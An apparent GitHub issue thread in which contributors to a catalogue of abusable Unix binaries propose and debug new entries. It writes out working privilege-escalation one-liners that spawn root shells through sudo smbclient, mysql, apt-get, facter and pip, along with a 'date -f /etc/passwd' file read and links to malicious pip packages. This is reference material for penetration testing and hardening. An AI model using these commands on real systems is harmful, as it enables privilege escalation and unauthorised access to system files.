New bins

[AlessandroZ]

Sorry for opening an issue and not doing a PR but I don't have lot of time, you will do it faster than me.
These new ways are from the FallofSudo project.

Here are some other tools:

• smbclient

Connect to a valid SMB or CIFS share:
sudo smbclient \\ip\share -U username
smb:> !/bin/bash

• mysql
  sudo mysql -e '\! /bin/bash'

• apt-get

sudo apt-get changelog bash
!/bin/bash

• apt (same as apt-get)
• mv
• cp
• chown
• chmod
• facter

[epinna]

Thanks AlessandroZ, that's a great contribution, I'll work on this next days.

[epinna]

Did you try the facter payload? My version uses a slightly different syntax i.e. uses --external-dir but I get no command execution.

$ cat x2
Facter.add(x) do
  setcode do
    Facter::Core::Execution.execute('/usr/bin/id > /tmp/output')
    Facter::Util::Resolution.exec('/usr/bin/id > /tmp/output')
  end
end
$ facter --external-dir=.
Fact file ./x2 was parsed but returned an empty data set
...
$ cat /tmp/output
cat: /tmp/output: No such file or directory

Since it's Ruby I also tried some generic ruby command execution statement, with no luck so far.

[AlessandroZ]

Hi,

No in fact, I haven't tested it before. I do not have custom-dir as well but it should be alse done using the environment variable FACTERLIB. I have just done some test but without success.

I agree, it's weird, in lot of examples, they launch system command.

[cyrus-and]

OK the problem was that directories must be absolute paths.

Also apparently there are two kind of facts:

• custom facts (that uses FACTERLIB) are Ruby files;
• external facts (that uses external-dir) are any shebanged executable file.

The nice thing about the former is that the Ruby code is executed within the main ruby process so with an exec we can replace it with a proper interactive shell.

Here's how:

TF=$(mktemp --tmpdir XXXXXXXXXX.rb)
echo 'exec("/bin/sh")' > $TF
FACTERLIB=/tmp/ facter

I'm going to add the binary.

[AlessandroZ]

Awesome, nice work. 👍

[AlessandroZ]

I have seen this one too:
date -f /etc/passwd

[AlessandroZ]

pip as well using a custom repo:
pip install custom_repo

Like these repos (or another custom one):

• https://github.com/mschwager/0wned
• https://github.com/0x00-0x00/FakePip

[cyrus-and]

Thanks @AlessandroZ, let's see if GitHub can help us keeping track of this:

• chown
• chmod
• date -f /etc/passwd
• pip
• finger TODO: mention this link in the commit

[cyrus-and]

Here's the pip version, it's just execute-interactive, I'm not sure if we should add all the other functions since it's basically Python.

TF=$(mktemp -d)
echo 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.py
pip install $TF

[AlessandroZ]

It's perfect like that. Thanks for your work. 👍